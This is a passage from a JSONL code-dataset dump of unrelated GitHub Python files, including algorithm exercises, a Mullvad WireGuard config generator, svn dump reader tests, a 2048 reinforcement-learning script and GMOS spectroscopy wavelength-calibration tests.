'ir.actions.act_window'}\n","repo_name":"decodio/l10n_hr","sub_path":"l10n_hr_sepa/wizard/payment_order_create.py","file_name":"payment_order_create.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"69815145426","text":"def countTriplets(arr,n,sum):\n \n # Sort input array\n arr.sort()\n \n # Initialize result\n ans = 0\n \n # Every iteration of loop counts triplet with\n # first element as arr[i].\n for i in range(0,n-2):\n \n # Initialize other two elements as corner elements\n # of subarray arr[j+1..k]\n j = i + 1\n k = n-1\n \n # Use Meet in the Middle concept\n while(j < k):\n \n # If sum of current triplet is more or equal,\n # move right corner to look for smaller values\n if (arr[i]+arr[j]+arr[k] >=sum):\n k = k-1\n \n # Else move left corner\n else:\n \n # This is important. 
For current i and j, there\n # can be total k-j third elements.\n ans += (k - j)\n j = j+1\n \n return ans\n \n# Driver program\nif __name__=='__main__':\n arr = [5, 1, 3, 4, 7]\n n = len(arr)\n sum = 12\n print(countTriplets(arr, n, sum))\n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Searching and Sorting/113.Count Triplets sum less than given Number.py","file_name":"113.Count Triplets sum less than given Number.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40655434461","text":"import labrad\nimport time\n\ndef square_numbers(cxn, numbers):\n ss = cxn.squaring_server\n t_start = time.time()\n print(\"Starting synchronous requests...\")\n for n in numbers:\n square = ss.square(n)\n print(\"%f**2 = %f\"%(n, square))\n t_total = time.time() - t_start\n print(\"Finished %d requests after %f seconds.\"%(len(numbers), t_total))\n","repo_name":"joshmutus/pylabrad-wiki","sub_path":"synchronousclient_1.py","file_name":"synchronousclient_1.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16979087422","text":"#!/usr/bin/python\n\nimport json\n#import urllib.request\nimport urllib2\nimport random\nimport sys\nimport os.path\n\nurl=\"https://api.mullvad.net/www/relays/all/\"\ndir=\"/etc/wireguard\"\n\n#servers=json.load(urllib.request.urlopen(url))\nservers=json.load(urllib2.urlopen(url))\n#servers=json.load(open('api','r'))\n\nservers=[x for x in servers if x['type']=='wireguard']\nif len(sys.argv)>1:\n\tservers=[x for x in servers if x['country_code']==sys.argv[1]]\nif len(sys.argv)>2:\n\tservers=[x for x in servers if x['city_code']==sys.argv[2]]\n\nowned=[x for x in servers if x['owned']==1]\nif len(owned)>0: servers=owned\n\nserver=servers[random.randint(0,len(servers)-1)]\n\nprint (json.dumps(server, indent=4))\n\nhostname=server[\"hostname\"]\nservername=\"mullvad-\"+hostname[:hostname.index('-')]\n\nwith open(os.path.join(dir,'template'),'r') as file:\n\ttemplate=file.read()\n\n#with open('outfile','w') as file:\nwith open(os.path.join(dir,servername+\".conf\"),'w') as file:\n\tfile.write(template)\n\tfile.write(\"PublicKey = \"+server[\"pubkey\"]+\"\\n\")\n\tfile.write(\"Endpoint = \"+server[\"ipv4_addr_in\"]+\":51820\"+\"\\n\")\n\nos.chmod(os.path.join(dir,servername+\".conf\"),0o600);\n","repo_name":"m0gjr/bashcrap","sub_path":"bin/mullvad.py","file_name":"mullvad.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34772525503","text":"import os\nimport sys\nfrom distutils.core import setup, Extension\n\ndkp = os.getenv(\"DEVKITPRO\")\nif dkp is None:\n print(\"Please set DEVKITPRO in your environment. 
export DEVKITPRO=/devkitpro\")\n sys.exit(1)\n\nlibnx = f\"{dkp}/libnx\"\n\nnx_ext = Extension(\"_nx\",\n include_dirs = [f\"{libnx}/include\"],\n #define_macros = [(\"__SWITCH__\",)],\n #libraries = [\"nx\"],\n #library_dirs = [f\"{libnx}/lib\"],\n sources = [\"Modules/_nx.c\"],\n)\n\nsetup(\n name = \"_nx\",\n ext_modules = [nx_ext],\n)","repo_name":"friedkeenan/nxpy","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25871498431","text":"import heapq\nimport sys\ninput = sys.stdin.readline\ndef find_parents(X):\n if make_set[X] ==X:\n return X\n else:\n make_set[X] = find_parents(make_set[X])\n return make_set[X]\n\n\ndef union(a,b):\n X = find_parents(a)\n Y = find_parents(b)\n if X == Y:\n return False\n if rank[X]< rank[Y]:\n X,Y = Y,X\n make_set[Y] = X\n if rank[X] == rank[Y]:\n rank[X] += 1\n return True\n\n\nP,W = map(int,input().split())\n\nc,v = map(int,input().split())\n\nweight_list = [list(map(int,input().split())) for _ in range(W)]\nmake_set = [i for i in range(P)]\nweight_list.sort(key=lambda x : x[2])\nrank = [1 for _ in range(P)]\nresult = float('inf')\nwhile find_parents(c) != find_parents(v):\n node_a,node_b,pay = weight_list.pop()\n if union(node_a,node_b):\n result = pay\n\n\nprint(result)","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/11085_군사_이동_version1.py","file_name":"11085_군사_이동_version1.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8456559541","text":"from stopwatch import Stopwatch\n# no matter how large n gets the runtime of our algorithm is constant.\n\n\ndef constant_run_time(N):\n total_sum = 0\n for i in range(0, 50):\n # Add all numbers from 0 to 50\n total_sum += i\n # print(total_sum)\n return total_sum\n\n\nif __name__ == \"__main__\":\n input_sizes = [100, 200, 400, 800, 1600, 3200, 6400]\n for input_size in input_sizes:\n # This times the function\n timer = Stopwatch()\n constant_run_time(input_size)\n # what's odd with this output is the run times actually get faster, or\n # go down but they aren't increasing so that's good?\n print(input_size, timer.elapsed_time())\n","repo_name":"dky/cb","sub_path":"legacy/fundamentals/runtime-space-complexity/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"68270605","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^ta_courses', views.course, name='ta_courses'),\n url(r'^ta_hw', views.hw, name='ta_hw'),\n url(r'^new_hw', views.new_hw, name='new_hw'),\n url(r'^mark_hw', views.mark_hw, name='mark_hw'),\n url(r'^ta_forum', views.ta_forum, name='ta_forum'),\n url(r'^ta_resource_comment', views.ta_resource_comment, name='ta_resource_comment'),\n url(r'^message', views.message, name='ta_message'),\n]\n","repo_name":"wsyzxxxx/Teaching_management","sub_path":"ta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19185242565","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\n\nNUM_STEP = 100\nBATCH_SIZE = 32\nTRAIN_SIZE = NUM_STEP * BATCH_SIZE\nCYCLES = 100\n\nDISCOUNT = 0.9\n\nmodelName = 'noRegCNNSLT.h5'\n\n\ndef moveWithoutSpawn(board, direction):\n board_to_left = np.rot90(board, -direction)\n for row in range(4):\n core = _merge(board_to_left[row])\n board_to_left[row, :len(core)] = core\n board_to_left[row, len(core):] = 0\n\n # rotation to the original\n return np.rot90(board_to_left, direction)\n\n\ndef _merge(row):\n '''merge the row, there may be some improvement'''\n non_zero = row[row != 0] # remove zeros\n core = [None]\n for elem in non_zero:\n if core[-1] is None:\n core[-1] = elem\n elif core[-1] == elem:\n core[-1] = 2 * elem\n core.append(None)\n else:\n core.append(elem)\n if core[-1] is None:\n core.pop()\n return core\n\n\nif __name__ == \"__main__\":\n\n model = keras.models.load_model(modelName)\n\n states = np.load('EpisodeLogs/sAug.npy')\n reward = np.load('EpisodeLogs/rAug.npy')\n spp = np.zeros((TRAIN_SIZE, 4, 4))\n Qp = np.zeros((TRAIN_SIZE, 4))\n\n numEx = states.shape[0]\n\n for cyc in range(CYCLES):\n chosen = np.random.choice(np.linspace(\n 0, numEx - 2, num=numEx - 1).astype(int), TRAIN_SIZE, replace=False)\n s = states[chosen]\n sp = states[chosen + 1]\n r = reward[chosen]\n\n for dir in range(4):\n for i in range(TRAIN_SIZE):\n spp[i] = moveWithoutSpawn(sp[i], dir)\n Qp[:, dir] = model.predict(\n spp.reshape((TRAIN_SIZE, 4, 4, 1))).flatten()\n Q = r + DISCOUNT * np.max(Qp, axis=1)\n\n model.fit(s.reshape((TRAIN_SIZE, 4, 4, 1)),\n Q.reshape((TRAIN_SIZE, 1)), epochs=1)\n model.save('noRegCNNSLT.h5', save_format='h5', overwrite=True)\n","repo_name":"ndombe/2048-solver","sub_path":"ReinforcementLearning/continueTrainCNN.py","file_name":"continueTrainCNN.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22212479790","text":"import configparser\nimport os\n\n\nclass ReadIni:\n\n def __init__(self, file_name=None, node=None):\n if file_name is None:\n file = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n file_name = file + \"/data/element.ini\"\n else:\n self.file_name = file_name\n\n if node is None:\n self.node = \"ContactElement\"\n else:\n self.node = node\n self.ele = self.load_ini(file_name)\n\n def load_ini(self, file_name):\n ele = configparser.ConfigParser()\n ele.read(file_name, encoding='utf-8')\n return ele\n\n def get_value(self, key):\n data = self.ele.get(self.node, key)\n return data\n\n\nif __name__ == '__main__':\n s = ReadIni()\n 
print(s.get_value(\"add_contact\"))\n","repo_name":"an5456/selenium_project","sub_path":"test_page/utils/read_ini.py","file_name":"read_ini.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37697774074","text":"from . import classes\n\n\ndef start():\n show_initial_info()\n while True:\n userinput = input('You\\t> ')\n intent, text = get_response(userinput)\n print('Alfred\\t> ' + text)\n if intent == classes.GOODBYE:\n break\n\n\ndef get_response(sentence):\n intent = 'bye'\n text = 'Work in progress'\n return intent, text\n\n\ndef show_initial_info():\n print('Welcome, sir! My name is Alfred, how can I help you?')\n","repo_name":"thalesaguiar21/Alfred","sub_path":"alfred/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41021005453","text":"from unittest import TestCase\nfrom StringIO import StringIO\nfrom svnfiltereddump import SvnDumpReader\n\n\nclass SvnDumpReaderTests(TestCase):\n\n def test_read_props_and_text(self):\n fh = StringIO(\"\"\"\nNode-path: bla\nNode-kind: file\nNode-action: add\nProp-content-length: 27\nText-content-length: 16\nText-content-md5: 4b6209c3b1032d515731c4f992fff73a\nText-content-sha1: a1d199953be4046ac8067ef1724ce5796a791fe3\nContent-length: 43\n\nK 4\nblub\nV 3\nXXX\nPROPS-END\nfsdfa\nfgasdfgsd\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Node-path', 'Node-kind', 'Node-action',\n 'Prop-content-length', 'Text-content-length',\n 'Text-content-md5', 'Text-content-sha1',\n 'Content-length'\n ])\n self.assertEqual(lump.get_header('Node-kind'), 'file')\n self.assertEqual(lump.get_header('Node-action'), 'add')\n self.assertEqual(lump.properties['blub'], 'XXX')\n out_fh = StringIO()\n lump.content.empty_to(out_fh)\n out_fh.seek(0)\n self.assertEqual(out_fh.read(), \"\"\"fsdfa\nfgasdfgsd\n\"\"\")\n\n def test_read_props_only(self):\n fh = StringIO(\"\"\"\nRevision-number: 5\nProp-content-length: 107\nContent-length: 107\n\nK 7\nsvn:log\nV 5\nTest\n\nK 10\nsvn:author\nV 8\nwilhelmh\nK 8\nsvn:date\nV 27\n2011-09-09T15:42:21.809782Z\nPROPS-END\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Revision-number', 'Prop-content-length', 'Content-length'\n ])\n self.assertEqual(lump.get_header('Revision-number'), '5')\n self.assertEqual(lump.properties['svn:log'], \"Test\\n\")\n self.assertEqual(lump.properties['svn:author'], \"wilhelmh\")\n self.assertEqual(lump.properties['svn:date'], \"2011-09-09T15:42:21.809782Z\")\n self.assertEqual(lump.content, None)\n\n def test_read_text_only(self):\n fh = StringIO(\"\"\"\nNode-path: a\nNode-kind: file\nNode-action: change\nText-content-length: 2\nText-content-md5: 009520053b00386d1173f3988c55d192\nText-content-sha1: 9063a9f0e032b6239403b719cbbba56ac4e4e45f\nContent-length: 2\n\ny\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Node-path', 'Node-kind', 'Node-action',\n 'Text-content-length', 'Text-content-md5', 'Text-content-sha1',\n 'Content-length'\n ])\n self.assertEqual(lump.get_header('Node-kind'), 'file')\n self.assertEqual(lump.properties.keys(), [])\n out_fh = StringIO()\n lump.content.empty_to(out_fh)\n out_fh.seek(0)\n self.assertEqual(out_fh.read(), \"y\\n\")\n\n def 
test_read_add_node_without_md5sum(self):\n # With some versions of Subversion an 'add' node for an empty\n # file may come without MD5 sum.\n fh = StringIO(\"\"\"\nNode-path: bla\nNode-kind: file\nNode-action: add\nProp-content-length: 10\nText-content-length: 0\nContent-length: 10\n\nPROPS-END\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Node-path', 'Node-kind', 'Node-action',\n 'Prop-content-length', 'Text-content-length',\n 'Content-length'\n ])\n self.assertEqual(lump.get_header('Node-kind'), 'file')\n self.assertEqual(lump.get_header('Node-action'), 'add')\n out_fh = StringIO()\n lump.content.empty_to(out_fh)\n out_fh.seek(0)\n self.assertEqual(out_fh.read(), '')\n","repo_name":"TNG/svnfiltereddump","sub_path":"tests/TestSvnDumpReader.py","file_name":"TestSvnDumpReader.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"42971540593","text":"#!/usr/bin/env python\n\"\"\"\nTests related to GMOS Long-slit Spectroscopy Arc primitives. `input_files` is a\nlist of tuples which contains:\n\n - the input filename,\n - the full-width-at-half-maximum measured using IRAF's splot,\n - the wavelength solution order guessed based on residuals (usually between 2 and 4),\n - the minimum signal to noise for detection, based on splot analysis.\n\nThe input data can be cached from the archive and/or processed using the\n--force-preprocess-data command line option.\n\nNotes\n-----\n- The `indirect` argument on `@pytest.mark.parametrize` fixture forces the\n `ad` and `ad_ref` fixtures to be called and the AstroData object returned.\n\n @bquint:\n It seems that the matching process depends heavily on the FWHM. Because of\n that, the FWHM was measured using `splot` (keys h, c) manually for each\n file. It basically tells how far the KDTreeFitter should look for a match.\n\n The fitting order was picked up after running the test and analysing the\n shape of the residuals.\n\n Finally, the min_snr was semi-arbitrary. It had an opposite effect from\n what I, expected. 
Sometimes, raising this number caused more peaks to be\n detected.\n\n\"\"\"\nimport glob\nimport os\nimport tarfile\nimport logging\nfrom copy import deepcopy\nfrom importlib import import_module\n\nimport numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\nfrom astropy import units as u\nfrom specutils.utils.wcs_utils import air_to_vac\n\nimport astrodata\nimport geminidr\n\nfrom geminidr.gmos.primitives_gmos_longslit import GMOSLongslit, GMOSClassicLongslit\nfrom gempy.library import astromodels as am\nfrom gempy.utils import logutils\n\n\n# Test parameters --------------------------------------------------------------\ndetermine_wavelength_solution_parameters = {\n 'center': None,\n 'nsum': 10,\n 'linelist': None,\n 'weighting': 'global',\n 'fwidth': None,\n 'order': 3,\n 'min_snr': 10,\n}\n\ninput_pars = [\n # Process Arcs: GMOS-N ---\n # (Input File, params)\n (\"N20100115S0346_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"N20130112S0390_mosaic.fits\", dict()), # B600:0.500 E2V\n (\"N20170609S0173_mosaic.fits\", dict()), # B600:0.500 HAM\n (\"N20170403S0452_mosaic.fits\", dict()), # B600:0.590 HAM\n (\"N20170415S0255_mosaic.fits\", dict()), # B600:0.590 HAM\n (\"N20171016S0010_mosaic.fits\", dict()), # B600:0.500 HAM\n (\"N20171016S0127_mosaic.fits\", dict()), # B600:0.500 HAM\n (\"N20180103S0341_mosaic.fits\", dict()), # B600:0.430 HAM\n (\"N20180113S0351_mosaic.fits\", dict()), # B600:0.750 HAM\n (\"N20180615S0407_mosaic.fits\", dict()), # B600:0.620 HAM\n (\"N20100307S0236_mosaic.fits\", dict()), # B1200:0.445 EEV\n (\"N20130628S0290_mosaic.fits\", dict()), # B1200:0.420 E2V\n (\"N20170904S0078_mosaic.fits\", dict()), # B1200:0.440 HAM\n (\"N20170627S0116_mosaic.fits\", dict()), # B1200:0.520 HAM\n (\"N20100830S0594_mosaic.fits\", dict()), # R150:0.500 EEV\n (\"N20100702S0321_mosaic.fits\", dict()), # R150:0.700 EEV\n (\"N20130606S0291_mosaic.fits\", dict()), # R150:0.550 E2V\n (\"N20130112S0574_mosaic.fits\", dict()), # R150:0.700 E2V\n #(\"N20130809S0337_mosaic.fits\", dict()), # R150:0.700 E2V 2\" slit\n #(\"N20140408S0218_mosaic.fits\", dict()), # R150:0.700 E2V 2\" slit\n (\"N20180119S0232_mosaic.fits\", dict()), # R150:0.520 HAM\n (\"N20171007S0439_mosaic.fits\", dict()), # R150:0.650 HAM\n #(\"N20181114S0512_mosaic.fits\", dict()), # R150:0.610 HAM 2\" slit I can't identify\n (\"N20180111S0155_mosaic.fits\", dict()), # R150:0.610 HAM\n (\"N20171007S0441_mosaic.fits\", dict()), # R150:0.650 HAM\n (\"N20101212S0213_mosaic.fits\", dict()), # R400:0.550 EEV\n (\"N20100202S0214_mosaic.fits\", dict()), # R400:0.700 EEV\n (\"N20130106S0194_mosaic.fits\", dict(min_snr=3)), # R400:0.500 E2V\n (\"N20130422S0217_mosaic.fits\", dict()), # R400:0.700 E2V\n (\"N20170108S0210_mosaic.fits\", dict()), # R400:0.660 HAM\n (\"N20171113S0135_mosaic.fits\", dict()), # R400:0.750 HAM\n (\"N20100427S1274_mosaic.fits\", dict()), # R600:0.475 EEV\n (\"N20100427S1276_mosaic.fits\", dict()), # R600:0.675 EEV\n (\"N20120615S0512_mosaic.fits\", dict()), # R600:0.750 e2v\n (\"N20120615S0513_mosaic.fits\", dict()), # R600:0.950 e2v\n (\"N20180120S0417_mosaic.fits\", dict()), # R600:0.865 HAM\n # actually closer to 833nm, so use \"alternative_centers\"\n (\"N20180516S0214_mosaic.fits\", dict(debug_alternative_centers=True)), # R600:0.860 HAM\n (\"N20100212S0143_mosaic.fits\", dict()), # R831:0.450 EEV\n (\"N20100720S0247_mosaic.fits\", dict()), # R831:0.850 EEV\n (\"N20130808S0490_mosaic.fits\", dict()), # R831:0.571 E2V\n (\"N20130830S0291_mosaic.fits\", dict()), # R831:0.845 E2V\n 
(\"N20170910S0009_mosaic.fits\", dict()), # R831:0.653 HAM\n (\"N20170509S0682_mosaic.fits\", dict()), # R831:0.750 HAM\n (\"N20170416S0058_mosaic.fits\", dict()), # R831:0.855 HAM\n (\"N20170416S0081_mosaic.fits\", dict()), # R831:0.865 HAM\n (\"N20180120S0315_mosaic.fits\", dict()), # R831:0.865 HAM\n (\"N20190111S0271_mosaic.fits\", dict()), # R831:0.525 HAM\n #\n # # Process Arcs: GMOS-S ---\n (\"S20130218S0126_mosaic.fits\", dict()), # B600:0.600 EEV\n (\"S20130111S0278_mosaic.fits\", dict()), # B600:0.520 EEV\n (\"S20130114S0120_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20130216S0243_mosaic.fits\", dict()), # B600:0.480 EEV\n (\"S20130608S0182_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20131105S0105_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20140504S0008_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20170103S0152_mosaic.fits\", dict(nbright=2)), # B1200:0.440 HAM bad columns\n (\"S20170108S0085_mosaic.fits\", dict(nbright=2)), # B600:0.500 HAM\n (\"S20130510S0103_mosaic.fits\", dict()), # B1200:0.450 EEV\n (\"S20130629S0002_mosaic.fits\", dict()), # B1200:0.525 EEV\n (\"S20131123S0044_mosaic.fits\", dict()), # B1200:0.595 EEV\n (\"S20170116S0189_mosaic.fits\", dict()), # B1200:0.440 HAM\n (\"S20170908S0189_mosaic.fits\", dict(nbright=1)), # B1200:0.595 HAM bad column\n (\"S20131230S0153_mosaic.fits\", dict()), # R150:0.550 EEV\n (\"S20130801S0140_mosaic.fits\", dict()), # R150:0.700 EEV\n (\"S20170430S0060_mosaic.fits\", dict(nbright=2)), # R150:0.717 HAM bad columns\n (\"S20170430S0063_mosaic.fits\", dict(nbright=2)), # R150:0.727 HAM bad columns\n (\"S20171102S0051_mosaic.fits\", dict()), # R150:0.950 HAM\n (\"S20130114S0100_mosaic.fits\", dict()), # R400:0.620 EEV\n (\"S20130217S0073_mosaic.fits\", dict()), # R400:0.800 EEV\n (\"S20170108S0046_mosaic.fits\", dict(nbright=2)), # R400:0.550 HAM bad columns\n (\"S20170129S0125_mosaic.fits\", dict(nbright=1)), # R400:0.685 HAM bad column\n (\"S20170703S0199_mosaic.fits\", dict()), # R400:0.850 HAM\n (\"S20170718S0420_mosaic.fits\", dict()), # R400:0.910 HAM\n #(\"S20101218S0139_mosaic.fits\", dict()), # R600:0.675 EEV 5-arcsec slit!\n #(\"S20110306S0294_mosaic.fits\", dict()), # R600:0.675 EEV 5-arcsec slit!\n (\"S20110720S0236_mosaic.fits\", dict()), # R600:0.675 EEV\n (\"S20101221S0090_mosaic.fits\", dict()), # R600:0.690 EEV\n (\"S20120322S0122_mosaic.fits\", dict()), # R600:0.900 EEV\n (\"S20130803S0011_mosaic.fits\", dict()), # R831:0.576 EEV\n (\"S20130414S0040_mosaic.fits\", dict()), # R831:0.845 EEV\n (\"S20170214S0059_mosaic.fits\", dict(nbright=3)), # R831:0.440 HAM\n (\"S20170703S0204_mosaic.fits\", dict()), # R831:0.600 HAM\n (\"S20171018S0048_mosaic.fits\", dict()) # R831:0.865 HAM\n]\n\n\n# Tests Definitions ------------------------------------------------------------\n\n@pytest.mark.wavecal\n@pytest.mark.slow\n@pytest.mark.gmosls\n@pytest.mark.preprocessed_data\n@pytest.mark.regression\n@pytest.mark.parametrize(\"ad, params\", input_pars, indirect=['ad'])\ndef test_regression_determine_wavelength_solution(\n ad, params, caplog, change_working_dir, path_to_refs, request):\n \"\"\"\n Make sure that the wavelength solution gives same results on different\n runs.\n \"\"\"\n caplog.set_level(logging.INFO, logger=\"geminidr\")\n\n with change_working_dir():\n logutils.config(file_name='log_regress_{:s}.txt'.format(ad.data_label()))\n p = GMOSLongslit([ad])\n p.viewer = geminidr.dormantViewer(p, None)\n\n p.determineWavelengthSolution(**{**determine_wavelength_solution_parameters,\n **params})\n\n wcalibrated_ad 
= p.streams[\"main\"][0]\n\n for record in caplog.records:\n if record.levelname == \"WARNING\":\n assert \"No acceptable wavelength solution found\" not in record.message\n\n ref_ad = astrodata.open(os.path.join(path_to_refs, wcalibrated_ad.filename))\n model = am.get_named_submodel(wcalibrated_ad[0].wcs.forward_transform, \"WAVE\")\n ref_model = am.get_named_submodel(ref_ad[0].wcs.forward_transform, \"WAVE\")\n\n x = np.arange(wcalibrated_ad[0].shape[1])\n wavelength = model(x)\n ref_wavelength = ref_model(x)\n\n pixel_scale = wcalibrated_ad[0].pixel_scale() # arcsec / px\n slit_size_in_arcsec = float(wcalibrated_ad[0].focal_plane_mask().replace('arcsec', ''))\n slit_size_in_px = slit_size_in_arcsec / pixel_scale\n dispersion = abs(wcalibrated_ad[0].dispersion(asNanometers=True)) # nm / px\n\n # We don't care about what the wavelength solution is doing at\n # wavelengths outside where we've matched lines\n lines = ref_ad[0].WAVECAL[\"wavelengths\"].data\n indices = np.where(np.logical_and(ref_wavelength > lines.min(),\n ref_wavelength < lines.max()))\n tolerance = 0.5 * (slit_size_in_px * dispersion)\n np.testing.assert_allclose(wavelength[indices], ref_wavelength[indices],\n atol=tolerance)\n\n if request.config.getoption(\"--do-plots\"):\n do_plots(wcalibrated_ad)\n\n\n# We only need to test this with one input\n@pytest.mark.gmosls\n@pytest.mark.preprocessed_data\n@pytest.mark.parametrize(\"ad, params\", input_pars[:1], indirect=['ad'])\ndef test_consistent_air_and_vacuum_solutions(ad, params):\n p = GMOSClassicLongslit([])\n p.viewer = geminidr.dormantViewer(p, None)\n\n new_params = {**determine_wavelength_solution_parameters, **params}\n ad_air = p.determineWavelengthSolution(\n [deepcopy(ad)], **new_params, in_vacuo=False).pop()\n ad_vac = p.determineWavelengthSolution(\n [ad], **new_params, in_vacuo=True).pop()\n wave_air = am.get_named_submodel(ad_air[0].wcs.forward_transform, \"WAVE\")\n wave_vac = am.get_named_submodel(ad_vac[0].wcs.forward_transform, \"WAVE\")\n x = np.arange(ad_air[0].shape[1])\n wair = wave_air(x)\n wvac = air_to_vac(wair * u.nm).to(u.nm).value\n dw = wvac - wave_vac(x)\n assert abs(dw).max() < 0.001\n\n\n# We only need to test this with one input\n@pytest.mark.gmosls\n@pytest.mark.preprocessed_data\n@pytest.mark.parametrize(\"ad, params\", input_pars[:1], indirect=['ad'])\n@pytest.mark.parametrize(\"in_vacuo\", (True, False))\ndef test_user_defined_linelist(ad, params, in_vacuo):\n p = GMOSClassicLongslit([])\n p.viewer = geminidr.dormantViewer(p, None)\n new_params = determine_wavelength_solution_parameters.copy()\n new_params.pop(\"linelist\")\n new_params.update(params)\n\n linelist = os.path.join(os.path.dirname(geminidr.__file__),\n \"gmos\", \"lookups\", \"CuAr_GMOS.dat\")\n\n ad_out = p.determineWavelengthSolution(\n [deepcopy(ad)], in_vacuo=in_vacuo, linelist=None, **new_params).pop()\n ad_out2 = p.determineWavelengthSolution(\n [ad], in_vacuo=in_vacuo, linelist=linelist, **new_params).pop()\n wave1 = am.get_named_submodel(ad_out[0].wcs.forward_transform, \"WAVE\")\n wave2 = am.get_named_submodel(ad_out2[0].wcs.forward_transform, \"WAVE\")\n x = np.arange(ad_out[0].shape[1])\n np.testing.assert_array_equal(wave1(x), wave2(x))\n\n\n# Local Fixtures and Helper Functions ------------------------------------------\n@pytest.fixture(scope='function')\ndef ad(path_to_inputs, request):\n \"\"\"\n Returns the pre-processed spectrum file.\n\n Parameters\n ----------\n path_to_inputs : pytest.fixture\n Fixture defined in :mod:`astrodata.testing` with the path 
to the\n pre-processed input file.\n request : pytest.fixture\n PyTest built-in fixture containing information about parent test.\n\n Returns\n -------\n AstroData\n Input spectrum processed up to right before the\n `determineWavelengthSolution` primitive.\n \"\"\"\n filename = request.param\n path = os.path.join(path_to_inputs, filename)\n\n if os.path.exists(path):\n ad = astrodata.open(path)\n else:\n raise FileNotFoundError(path)\n\n return ad\n\n\ndef do_plots(ad):\n \"\"\"\n Generate diagnostic plots.\n\n Parameters\n ----------\n ad : astrodata\n \"\"\"\n output_dir = (\"./plots/geminidr/gmos/\"\n \"test_gmos_spect_ls_determine_wavelength_solution\")\n p = GMOSClassicLongslit([])\n lookup_dir = os.path.dirname(import_module('.__init__',\n p.inst_lookups).__file__)\n os.makedirs(output_dir, exist_ok=True)\n\n name, _ = os.path.splitext(ad.filename)\n grating = ad.disperser(pretty=True)\n bin_x = ad.detector_x_bin()\n bin_y = ad.detector_y_bin()\n central_wavelength = ad.central_wavelength(asNanometers=True)\n\n p = GMOSLongslit([ad])\n arc_table = os.path.join(lookup_dir, \"CuAr_GMOS.dat\")\n arc_lines = np.loadtxt(arc_table, usecols=[0]) / 10.0\n\n for ext_num, ext in enumerate(ad):\n\n if not hasattr(ext, \"WAVECAL\"):\n continue\n\n peaks = ext.WAVECAL[\"peaks\"] - 1 # ToDo: Refactor peaks to be 0-indexed\n wavelengths = ext.WAVECAL[\"wavelengths\"]\n wavecal_model = am.get_named_submodel(ext.wcs.forward_transform, \"WAVE\")\n\n middle = ext.data.shape[0] // 2\n sum_size = 10\n r1 = middle - sum_size // 2\n r2 = middle + sum_size // 2\n\n mask = np.round(np.average(ext.mask[r1:r2], axis=0)).astype(int)\n data = np.ma.masked_where(mask > 0, np.sum(ext.data[r1:r2], axis=0))\n data = (data - data.min()) / data.ptp()\n\n # -- Plot lines --\n fig, ax = plt.subplots(\n dpi=150, num=\"{:s}_{:d}_{:s}_{:.0f}\".format(\n name, ext_num, grating, central_wavelength))\n\n w = wavecal_model(np.arange(data.size))\n\n arcs = [ax.vlines(line, 0, 1, color=\"k\", alpha=0.25) for line in arc_lines]\n wavs = [ax.vlines(peak, 0, 1, color=\"r\", ls=\"--\", alpha=0.25)\n for peak in wavecal_model(peaks)]\n\n plot, = ax.plot(w, data, \"k-\", lw=0.75)\n\n ax.legend((plot, arcs[0], wavs[0]),\n (\"Normalized Data\", \"Reference Lines\", \"Matched Lines\"))\n\n x0, x1 = wavecal_model([0, data.size])\n ax.grid(alpha=0.1)\n ax.set_xlim(x0, x1)\n ax.set_xlabel(\"Wavelength [nm]\")\n ax.set_ylabel(\"Normalized intensity\")\n ax.set_title(\"Wavelength Calibrated Spectrum for\\n\"\n \"{:s}\\n obtained with {:s} at {:.0f} nm\".format(\n name, grating, central_wavelength))\n\n if x0 > x1:\n ax.invert_xaxis()\n\n fig_name = os.path.join(output_dir, 